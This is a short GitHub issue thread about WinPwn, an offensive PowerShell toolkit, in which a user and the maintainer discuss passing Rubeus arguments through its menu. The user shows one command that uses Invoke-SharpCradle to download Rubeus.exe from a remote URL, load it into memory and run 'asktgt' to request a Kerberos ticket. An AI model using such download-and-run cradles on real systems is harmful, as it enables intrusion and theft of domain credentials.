### ISSUE TITLE
Using Invoke-SharpCradle and point it to load Rubeus.exe into memory

### ISSUE THREAD

**Issue by IAMinZoho** [S3cur3Th1sSh1t/WinPwn#47]
On the Rubeus piece, I did find a way to use the Option 14 to load rubeus.exe into PowerShell using the Invoke-SharpCradle module in WinPwn. (Thanks to you again!!)

If I use `Invoke-SharpCradle -Url https://raw.githubxxxx -Argument1 asktgt /user:Bob /password:user@123`   ---> works perfectly well.

but, from WinPwn when I use the same functionality,  why do I need to pass 3 arguments separately? When I prompted for Argument1 I typed: `asktgt /user:Bob /password:user@123` and it failed to process! Is it not possible to pass the entire command as string and pass it to Rubeus as Argument1 in WinPwn just like Invoke-SharpCradle!

Please comment!

**Comment by IAMinZoho** [comment]
Please help. Thanks in advance.

**Comment by S3cur3Th1sSh1t** [comment]
The function only accepts two arguments, not more. So what you want to do with it is not possible.

![image](https://user-images.githubusercontent.com/27858067/182638133-1cdfd590-e4d2-467a-a47a-85dcd7badbef.png)

But I can still update the main menu with a Rubeus custom command option in the next days.

**Comment by S3cur3Th1sSh1t** [comment]
Here it is

https://github.com/S3cur3Th1sSh1t/WinPwn/commit/de0000ca7ebbaee5e34e11ef6bb7a6722f2da7f1

**Comment by IAMinZoho** [comment]
Thank you so much Fabian! ;-)
